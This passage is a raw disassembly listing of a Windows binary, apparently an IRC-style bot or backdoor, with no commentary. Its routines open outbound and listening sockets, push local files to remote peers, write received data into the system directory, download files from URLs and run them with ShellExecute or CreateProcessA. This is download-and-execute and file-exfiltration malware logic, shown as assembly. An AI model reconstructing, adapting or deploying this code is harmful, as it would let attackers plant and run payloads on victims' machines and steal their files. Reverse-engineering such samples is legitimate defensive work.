loc_40C253: ; CODE XREF: sub_40C21E+E�j
mov eax, esi
pop esi
not eax
retn
sub_40C21E endp
; =============== S U B R O U T I N E =======================================
sub_40C259 proc near ; CODE XREF: sub_40CAF1+24A�p
var_10 = dword ptr -10h
arg_0 = dword ptr 4
push ebx
push esi
xor ebx, ebx
push edi
push ebx
call sub_417B89
mov [esp+10h+var_10], offset aRb ; "rb"
push [esp+10h+arg_0]
mov esi, eax
call sub_4179A8
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_40C2A8
loc_40C27E: ; CODE XREF: sub_40C259+4D�j
test byte ptr [edi+0Ch], 10h
jnz short loc_40C2AC
inc ebx
push ebx
push esi
call sub_41944F
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40C2A8
push edi
push 1
lea eax, [esi+ebx-1]
push 1
push eax
call sub_418A86
add esp, 10h
jmp short loc_40C27E
; ---------------------------------------------------------------------------
loc_40C2A8: ; CODE XREF: sub_40C259+23�j
; sub_40C259+39�j
xor eax, eax
jmp short loc_40C2C7
; ---------------------------------------------------------------------------
loc_40C2AC: ; CODE XREF: sub_40C259+29�j
dec ebx
push ebx
push esi
call sub_40C21E
push esi
mov ebx, eax
call sub_417C3B
push edi
call sub_417900
add esp, 10h
mov eax, ebx
loc_40C2C7: ; CODE XREF: sub_40C259+51�j
pop edi
pop esi
pop ebx
retn
sub_40C259 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C2CB proc near ; CODE XREF: sub_40C351+33�p
; sub_40C8B4+BC�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call ds:dword_43AE18 ;; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_40C347
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call ds:dword_43AD98 ;; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call ds:dword_43ADD8 ;; inet_addr
cmp eax, esi
jnz short loc_40C32C
push [ebp+arg_0]
call ds:dword_43AE1C ;; gethostbyname
test eax, eax
jz short loc_40C347
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_40C32C: ; CODE XREF: sub_40C2CB+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call ds:dword_43AD40 ;; connect
cmp eax, esi
jnz short loc_40C34B
push edi
call ds:dword_43AE30 ;; closesocket
loc_40C347: ; CODE XREF: sub_40C2CB+1B�j
; sub_40C2CB+58�j
mov eax, esi
jmp short loc_40C34D
; ---------------------------------------------------------------------------
loc_40C34B: ; CODE XREF: sub_40C2CB+73�j
mov eax, edi
loc_40C34D: ; CODE XREF: sub_40C2CB+7E�j
pop edi
pop esi
leave
retn
sub_40C2CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C351 proc near ; DATA XREF: sub_40EE72+A88�o
var_11B4 = byte ptr -11B4h
var_1B4 = byte ptr -1B4h
var_1AC = byte ptr -1ACh
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 11B4h
call sub_417B30
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1B4]
rep movsd
push 1
pop esi
push [ebp+var_14]
mov [eax+1B0h], esi
lea eax, [ebp+var_1AC]
push eax
call sub_40C2CB
mov ebx, eax
pop ecx
cmp ebx, 0FFFFFFFFh
pop ecx
jnz short loc_40C3E4
lea eax, [ebp+var_11B4]
push offset dword_42E0D4
push eax
call sub_4172B0
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_40C3C7
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_40D679
add esp, 14h
loc_40C3C7: ; CODE XREF: sub_40C351+59�j
lea eax, [ebp+var_11B4]
push eax
call sub_40BF6D
push [ebp+var_10]
call sub_417078
pop ecx
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
loc_40C3E4: ; CODE XREF: sub_40C351+3F�j
push offset byte_436EDC
push ebx
call sub_40B56C
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40C44F
lea eax, [ebp+var_11B4]
push offset dword_42E094
push eax
call sub_4172B0
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_40C42B
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_40D679
add esp, 14h
loc_40C42B: ; CODE XREF: sub_40C351+BD�j
lea eax, [ebp+var_11B4]
push eax
call sub_40BF6D
pop ecx
push ebx
call ds:dword_43AE30 ;; closesocket
push [ebp+var_10]
call sub_417078
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
loc_40C44F: ; CODE XREF: sub_40C351+A3�j
push 64h
call ds:dword_424064 ;; Sleep
xor edi, edi
mov esi, 1000h
loc_40C45E: ; CODE XREF: sub_40C351+168�j
push esi
lea eax, [ebp+var_11B4]
push edi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_11B4]
push edi
push esi
push eax
push ebx
call ds:dword_43ADB0 ;; recv
test eax, eax
jle short loc_40C4BB
lea eax, [ebp+var_11B4]
push offset asc_42A660 ; "\n"
push eax
call sub_4179D0
lea eax, [ebp+var_11B4]
push eax
call sub_40B358
add esp, 0Ch
test eax, eax
jz short loc_40C4BB
push 64h
call ds:dword_424064 ;; Sleep
push 7
call sub_416FA4
test eax, eax
pop ecx
jnz short loc_40C45E
loc_40C4BB: ; CODE XREF: sub_40C351+130�j
; sub_40C351+154�j
lea eax, [ebp+var_11B4]
push offset dword_42E050
push eax
call sub_4172B0
cmp [ebp+var_8], edi
pop ecx
pop ecx
jnz short loc_40C4EE
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_40D679
add esp, 14h
loc_40C4EE: ; CODE XREF: sub_40C351+180�j
lea eax, [ebp+var_11B4]
push eax
call sub_40BF6D
pop ecx
push ebx
call ds:dword_43AE30 ;; closesocket
push [ebp+var_10]
call sub_417078
pop ecx
push edi
call ds:dword_424054 ;; ExitThread
sub_40C351 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C512 proc near ; DATA XREF: sub_40EE72+4A7C�o
var_A04 = byte ptr -0A04h
var_604 = byte ptr -604h
var_500 = dword ptr -500h
var_4FC = dword ptr -4FCh
var_3FC = byte ptr -3FCh
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
var_1E0 = byte ptr -1E0h
var_DC = byte ptr -0DCh
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A04h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1FC]
rep movsd
push 1
xor esi, esi
pop ebx
mov [ebp+var_10], esi
push esi
push ebx
push 2
mov [eax+1B0h], ebx
mov [ebp+var_C], esi
mov [ebp+var_20], esi
call ds:dword_43AE18 ;; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_18], edi
jnz short loc_40C560
push offset dword_42E258
jmp loc_40C719
; ---------------------------------------------------------------------------
loc_40C560: ; CODE XREF: sub_40C512+42�j
push 10h
lea eax, [ebp+var_30]
push esi
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_30], 2
push esi
call ds:dword_43AD98 ;; htons
mov word ptr [ebp+var_2E], ax
lea eax, [ebp+var_30]
push 10h
push eax
push edi
mov [ebp+var_2E+2], esi
call ds:dword_43ADC4 ;; bind
test eax, eax
jz short loc_40C59E
push offset dword_42E224
jmp loc_40C719
; ---------------------------------------------------------------------------
loc_40C59E: ; CODE XREF: sub_40C512+80�j
lea eax, [ebp+var_1C]
mov [ebp+var_1C], 10h
push eax
lea eax, [ebp+var_30]
push eax
push edi
call ds:dword_43AD3C ;; getsockname
push [ebp+var_2E]
call ds:dword_43ACD4 ;; htons
mov [ebp+var_4], eax
lea eax, [ebp+var_1E0]
push eax
mov [ebp+arg_0], esi
call sub_417AB0
pop ecx
loc_40C5D0: ; CODE XREF: sub_40C512+EF�j
mov ecx, [ebp+arg_0]
mov al, [ebp+ecx+var_1E0]
cmp al, 20h
jnz short loc_40C5E3
push 5Fh
pop eax
jmp short loc_40C5E6
; ---------------------------------------------------------------------------
loc_40C5E3: ; CODE XREF: sub_40C512+CA�j
movsx eax, al
loc_40C5E6: ; CODE XREF: sub_40C512+CF�j
mov [ebp+ecx+var_604], al
lea eax, [ebp+var_1E0]
inc ecx
push eax
mov [ebp+arg_0], ecx
call sub_417AB0
cmp [ebp+arg_0], eax
pop ecx
jbe short loc_40C5D0
push ebx
push edi
call ds:dword_43ADC0 ;; listen
test eax, eax
jz short loc_40C619
push offset dword_42E0D4
jmp loc_40C719
; ---------------------------------------------------------------------------
loc_40C619: ; CODE XREF: sub_40C512+FB�j
push esi
push esi
push 3
push esi
push ebx
lea eax, [ebp+var_1E0]
push 80000000h
push eax
call ds:off_424084
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_40C643
push offset dword_42E1F4
jmp loc_40C719
; ---------------------------------------------------------------------------
loc_40C643: ; CODE XREF: sub_40C512+125�j
push esi
push eax
call ds:off_4240A4
mov [ebp+arg_0], eax
push eax
movzx eax, word ptr [ebp+var_4]
push eax
push [ebp+var_1FC]
call sub_40AEE0
pop ecx
push eax
call ds:dword_43ADD8 ;; inet_addr
push eax
call ds:dword_43AD94 ;; htonl
push eax
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_3FC]
push offset dword_42E1DC
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_3FC]
push esi
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_40D679
add esp, 2Ch
lea eax, [ebp+var_38]
mov [ebp+var_38], 3Ch
mov [ebp+var_34], esi
push eax
push esi
lea eax, [ebp+var_500]
push esi
push eax
push esi
mov [ebp+var_4FC], edi
mov [ebp+var_500], ebx
call ds:dword_43AD80 ;; select
test eax, eax
jg short loc_40C6F3
push esi
lea eax, [ebp+var_DC]
push [ebp+var_54]
push offset dword_42E1B4
push eax
push [ebp+var_1FC]
call sub_40D679
jmp loc_40C817
; ---------------------------------------------------------------------------
loc_40C6F3: ; CODE XREF: sub_40C512+1BF�j
lea eax, [ebp+var_14]
mov [ebp+var_14], 10h
push eax
lea eax, [ebp+var_48]
push eax
push edi
call ds:dword_43AE2C ;; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_1F8], eax
jnz short loc_40C72C
push offset dword_42E180
loc_40C719: ; CODE XREF: sub_40C512+49�j
; sub_40C512+87�j ...
lea eax, [ebp+var_3FC]
push eax
call sub_4172B0
pop ecx
pop ecx
jmp loc_40C81A
; ---------------------------------------------------------------------------
loc_40C72C: ; CODE XREF: sub_40C512+200�j
push edi
call ds:dword_43AE30 ;; closesocket
cmp [ebp+arg_0], esi
jz loc_40C7DE
mov edi, 400h
loc_40C741: ; CODE XREF: sub_40C512+2C3�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
cmp eax, edi
jge short loc_40C74E
mov [ebp+var_4], eax
loc_40C74E: ; CODE XREF: sub_40C512+237�j
push edi
lea eax, [ebp+var_A04]
push esi
push eax
call sub_417330
mov eax, [ebp+arg_0]
add esp, 0Ch
neg eax
push 2
push esi
push eax
push [ebp+var_8]
call ds:off_4240C0
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_8]
call ds:off_424074
push esi
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_1F8]
call ds:dword_43ADE8 ;; send
mov [ebp+var_4], eax
push esi
cdq
add [ebp+var_10], eax
lea eax, [ebp+var_A04]
push edi
push eax
push [ebp+var_1F8]
adc [ebp+var_C], edx
call ds:dword_43ADB0 ;; recv
cmp eax, ebx
jl loc_40C873
mov eax, [ebp+var_4]
cmp eax, ebx
jl loc_40C873
sub [ebp+arg_0], eax
jnz loc_40C741
mov edi, [ebp+var_18]
loc_40C7DE: ; CODE XREF: sub_40C512+224�j
push [ebp+var_8]
call ds:off_424078
push [ebp+var_C]
push [ebp+var_10]
call sub_40D01A
pop ecx
pop ecx
push eax
lea eax, [ebp+var_1E0]
push eax
push [ebp+var_44]
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [ebp+var_3FC]
push offset dword_42E130
push eax
call sub_4172B0
loc_40C817: ; CODE XREF: sub_40C512+1DC�j
add esp, 14h
loc_40C81A: ; CODE XREF: sub_40C512+215�j
cmp [ebp+var_50], esi
jnz short loc_40C83F
push esi
lea eax, [ebp+var_3FC]
push [ebp+var_54]
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_40D679
add esp, 14h
loc_40C83F: ; CODE XREF: sub_40C512+30B�j
lea eax, [ebp+var_3FC]
push eax
call sub_40BF6D
cmp edi, esi
pop ecx
jbe short loc_40C857
push edi
call ds:dword_43AE30 ;; closesocket
loc_40C857: ; CODE XREF: sub_40C512+33C�j
push [ebp+var_1F8]
call ds:dword_43AE30 ;; closesocket
push [ebp+var_58]
call sub_417078
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
loc_40C873: ; CODE XREF: sub_40C512+2AF�j
; sub_40C512+2BA�j
push esi
mov esi, offset dword_42E108
push [ebp+var_54]
lea eax, [ebp+var_DC]
push esi
push eax
push [ebp+var_1FC]
call sub_40D679
push esi
call sub_40BF6D
add esp, 18h
push [ebp+var_1F8]
call ds:dword_43AE30 ;; closesocket
push [ebp+var_58]
call sub_417078
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
sub_40C512 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C8B4 proc near ; DATA XREF: sub_40EE72+7C0�o
var_14C4 = byte ptr -14C4h
var_4C4 = byte ptr -4C4h
var_2C4 = byte ptr -2C4h
var_1C0 = dword ptr -1C0h
var_1B8 = byte ptr -1B8h
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 14C4h
call sub_417B30
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1C0]
rep movsd
push 1
xor ebx, ebx
pop esi
mov [ebp+var_8], ebx
mov [eax+1B0h], esi
lea eax, [ebp+var_2C4]
push 104h
push eax
call ds:dword_424068 ;; GetSystemDirectoryA
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_2C4]
push offset aSS_2 ; "%s%s"
push eax
call sub_4172B0
add esp, 10h
lea eax, [ebp+var_2C4]
push ebx
push 80h
push 2
push ebx
push esi
push 40000000h
push eax
call ds:off_424084
cmp eax, 0FFFFFFFFh
jnz short loc_40C93E
push offset dword_42E350
jmp short loc_40C984
; ---------------------------------------------------------------------------
loc_40C93E: ; CODE XREF: sub_40C8B4+81�j
push eax
call ds:off_424078
lea eax, [ebp+var_2C4]
push offset aAB ; "a+b"
push eax
call sub_4179A8
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jnz short loc_40C966
push offset dword_42E310
jmp short loc_40C984
; ---------------------------------------------------------------------------
loc_40C966: ; CODE XREF: sub_40C8B4+A9�j
push [ebp+var_20]
lea eax, [ebp+var_1B8]
push eax
call sub_40C2CB
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+arg_0], eax
jnz short loc_40C997
push offset dword_42E2E0
loc_40C984: ; CODE XREF: sub_40C8B4+88�j
; sub_40C8B4+B0�j
lea eax, [ebp+var_4C4]
push eax
call sub_4172B0
pop ecx
pop ecx
jmp loc_40CA93
; ---------------------------------------------------------------------------
loc_40C997: ; CODE XREF: sub_40C8B4+C9�j
mov esi, 1000h
loc_40C99C: ; CODE XREF: sub_40C8B4+14E�j
push esi
lea eax, [ebp+var_14C4]
push ebx
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_14C4]
push ebx
push esi
push eax
push [ebp+arg_0]
call ds:dword_43ADB0 ;; recv
mov edi, eax
cmp edi, ebx
jz loc_40CA63
cmp edi, 0FFFFFFFFh
jz short loc_40CA04
push [ebp+var_4]
lea eax, [ebp+var_14C4]
push edi
push 1
push eax
call sub_4196EF
add [ebp+var_8], edi
add esp, 10h
push [ebp+var_8]
call ds:dword_43AD94 ;; htonl
mov [ebp+var_C], eax
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push [ebp+arg_0]
call ds:dword_43ADE8 ;; send
jmp short loc_40C99C
; ---------------------------------------------------------------------------
loc_40CA04: ; CODE XREF: sub_40C8B4+118�j
lea eax, [ebp+var_4C4]
push offset dword_42E108
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_40D679
lea eax, [ebp+var_4C4]
push eax
call sub_40BF6D
push [ebp+var_4]
call sub_417900
add esp, 24h
push [ebp+arg_0]
call ds:dword_43AE30 ;; closesocket
push [ebp+var_1C]
call sub_417078
pop ecx
push 1
call ds:dword_424054 ;; ExitThread
loc_40CA63: ; CODE XREF: sub_40C8B4+10F�j
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_40D01A
pop ecx
pop ecx
push eax
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_4C4]
push offset dword_42E28C
push eax
call sub_4172B0
add esp, 14h
loc_40CA93: ; CODE XREF: sub_40C8B4+DE�j
cmp [ebp+var_14], ebx
jnz short loc_40CAB8
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_40D679
add esp, 14h
loc_40CAB8: ; CODE XREF: sub_40C8B4+1E2�j
lea eax, [ebp+var_4C4]
push eax
call sub_40BF6D
cmp [ebp+var_4], ebx
pop ecx
jz short loc_40CAD3
push [ebp+var_4]
call sub_417900
pop ecx
loc_40CAD3: ; CODE XREF: sub_40C8B4+214�j
cmp [ebp+arg_0], ebx
jbe short loc_40CAE1
push [ebp+arg_0]
call ds:dword_43AE30 ;; closesocket
loc_40CAE1: ; CODE XREF: sub_40C8B4+222�j
push [ebp+var_1C]
call sub_417078
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
sub_40C8B4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CAF1 proc near ; DATA XREF: sub_40EE72+381E�o
; sub_40EE72+3F6D�o
var_570 = qword ptr -570h
var_564 = qword ptr -564h
var_510 = byte ptr -510h
var_310 = dword ptr -310h
var_304 = dword ptr -304h
var_2E4 = dword ptr -2E4h
var_2E0 = word ptr -2E0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_248 = byte ptr -248h
var_148 = byte ptr -148h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 510h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0AAh
mov esi, eax
lea edi, [ebp+var_2CC]
push 1
rep movsd
pop edi
xor esi, esi
push esi
mov [eax+2A4h], edi
push esi
push esi
lea eax, [ebp+var_248]
push esi
push eax
push ds:dword_43AD48
call ds:dword_43ACA8 ;; InternetOpenUrlA
cmp eax, esi
mov [ebp+var_18], eax
jz loc_40CF7D
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_148]
push 40000000h
push eax
call ds:off_424084
cmp eax, edi
mov [ebp+var_20], eax
jnb short loc_40CBB8
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset unk_42E5E4
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_40CB9B
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40D679
add esp, 14h
loc_40CB9B: ; CODE XREF: sub_40CAF1+88�j
lea eax, [ebp+var_510]
push eax
call sub_40BF6D
push [ebp+var_48]
call sub_417078
pop ecx
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
loc_40CBB8: ; CODE XREF: sub_40CAF1+68�j
xor edi, edi
call ds:dword_424058 ;; GetTickCount
mov ebx, 7D000h
mov dword ptr [ebp+var_8+4], eax
push ebx
call sub_417B89
pop ecx
mov [ebp+var_1C], eax
loc_40CBD2: ; CODE XREF: sub_40CAF1+1B4�j
push 200h
lea eax, [ebp+var_510]
push esi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_510]
push 200h
push eax
push [ebp+var_18]
call ds:dword_43ACB0 ;; InternetReadFile
cmp [ebp+var_34], esi
jz short loc_40CC16
push [ebp+arg_0]
lea eax, [ebp+var_510]
push eax
call sub_40CFE3
pop ecx
pop ecx
loc_40CC16: ; CODE XREF: sub_40CAF1+112�j
lea eax, [ebp+var_24]
push esi
push eax
lea eax, [ebp+var_510]
push [ebp+arg_0]
push eax
push [ebp+var_20]
call ds:dword_42407C ;; WriteFile
cmp edi, ebx
jnb short loc_40CC54
mov eax, ebx
sub eax, edi
cmp eax, [ebp+arg_0]
jbe short loc_40CC3E
mov eax, [ebp+arg_0]
loc_40CC3E: ; CODE XREF: sub_40CAF1+148�j
push eax
lea eax, [ebp+var_510]
push eax
mov eax, [ebp+var_1C]
add eax, edi
push eax
call sub_417390
add esp, 0Ch
loc_40CC54: ; CODE XREF: sub_40CAF1+13F�j
add edi, [ebp+arg_0]
cmp [ebp+var_3C], esi
jz short loc_40CC61
cmp edi, [ebp+var_3C]
ja short loc_40CCAB
loc_40CC61: ; CODE XREF: sub_40CAF1+169�j
cmp [ebp+var_44], 1
mov eax, edi
jz short loc_40CC7B
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset unk_42E59C
jmp short loc_40CC8B
; ---------------------------------------------------------------------------
loc_40CC7B: ; CODE XREF: sub_40CAF1+176�j
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset unk_42E55C
loc_40CC8B: ; CODE XREF: sub_40CAF1+188�j
mov eax, [ebp+var_48]
imul eax, 234h
add eax, offset dword_4405F0
push eax
call sub_4172B0
add esp, 10h
cmp [ebp+arg_0], esi
ja loc_40CBD2
loc_40CCAB: ; CODE XREF: sub_40CAF1+16E�j
cmp [ebp+var_3C], esi
mov [ebp+var_14], 1
jz short loc_40CD00
cmp edi, [ebp+var_3C]
jz short loc_40CD00
push [ebp+var_3C]
lea eax, [ebp+var_510]
mov [ebp+var_14], esi
push edi
push offset unk_42E518
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40D679
lea eax, [ebp+var_510]
push eax
call sub_40BF6D
add esp, 28h
loc_40CD00: ; CODE XREF: sub_40CAF1+1C4�j
; sub_40CAF1+1C9�j
call ds:dword_424058 ;; GetTickCount
sub eax, dword ptr [ebp+var_8+4]
xor edx, edx
mov ecx, 3E8h
push [ebp+var_20]
div ecx
xor edx, edx
mov ecx, eax
mov eax, edi
inc ecx
div ecx
mov ebx, eax
call ds:off_424078
push [ebp+var_1C]
call sub_417C3B
cmp [ebp+var_38], esi
pop ecx
jz short loc_40CD8A
lea eax, [ebp+var_148]
push eax
call sub_40C259
cmp eax, [ebp+var_38]
pop ecx
jz short loc_40CD8A
push [ebp+var_38]
mov [ebp+var_14], esi
push eax
lea eax, [ebp+var_510]
push offset unk_42E4E0
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40D679
lea eax, [ebp+var_510]
push eax
call sub_40BF6D
add esp, 28h
loc_40CD8A: ; CODE XREF: sub_40CAF1+241�j
; sub_40CAF1+253�j
cmp [ebp+var_14], esi
jz loc_40CFCA
cmp [ebp+var_44], 1
jz loc_40CE85
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_424698
lea eax, [ebp+var_148]
fstp [esp+564h+var_564]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul ds:dbl_424698
fstp [esp+570h+var_570]
push offset unk_42E498
push eax
call sub_4172B0
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_40CE05
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40D679
add esp, 14h
loc_40CE05: ; CODE XREF: sub_40CAF1+2F2�j
lea eax, [ebp+var_510]
push eax
call sub_40BF6D
cmp [ebp+var_40], 1
pop ecx
jnz loc_40CFCA
push 5
push esi
lea eax, [ebp+var_148]
push esi
push eax
push offset aOpen ; "open"
push esi
call ds:dword_43AD0C
cmp [ebp+var_30], esi
jnz loc_40CFCA
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset dword_42E464
push eax
call sub_4172B0
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40D679
lea eax, [ebp+var_510]
push eax
call sub_40BF6D
add esp, 24h
jmp loc_40CFCA
; ---------------------------------------------------------------------------
loc_40CE85: ; CODE XREF: sub_40CAF1+2A6�j
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_424698
lea eax, [ebp+var_148]
fstp [esp+564h+var_564]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul ds:dbl_424698
fstp [esp+570h+var_570]
push offset unk_42E414
push eax
call sub_4172B0
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_40CEED
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40D679
add esp, 14h
loc_40CEED: ; CODE XREF: sub_40CAF1+3DA�j
lea eax, [ebp+var_510]
push eax
call sub_40BF6D
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_417330
push 44h
lea eax, [ebp+var_310]
pop edi
push edi
push esi
push eax
call sub_417330
add esp, 1Ch
mov [ebp+var_310], edi
lea eax, [ebp+var_10]
mov [ebp+var_304], offset byte_436EDC
push 1
mov [ebp+var_2E0], si
pop edi
push eax
lea eax, [ebp+var_310]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp+var_148]
push esi
push eax
push esi
mov [ebp+var_2E4], edi
call ds:dword_424120 ;; CreateProcessA
cmp eax, edi
jnz short loc_40CF6F
call ds:dword_43ACF8 ;; WSACleanup
call sub_40AC42
push esi
call ds:off_42414C
loc_40CF6F: ; CODE XREF: sub_40CAF1+46A�j
lea eax, [ebp+var_148]
push eax
push offset unk_42E3CC
jmp short loc_40CF89
; ---------------------------------------------------------------------------
loc_40CF7D: ; CODE XREF: sub_40CAF1+45�j
lea eax, [ebp+var_248]
push eax
push offset unk_42E390
loc_40CF89: ; CODE XREF: sub_40CAF1+48A�j
lea eax, [ebp+var_510]
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_40CFBD
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40D679
add esp, 14h
loc_40CFBD: ; CODE XREF: sub_40CAF1+4AA�j
lea eax, [ebp+var_510]
push eax
call sub_40BF6D
pop ecx
loc_40CFCA: ; CODE XREF: sub_40CAF1+29C�j
; sub_40CAF1+325�j ...
push [ebp+var_18]
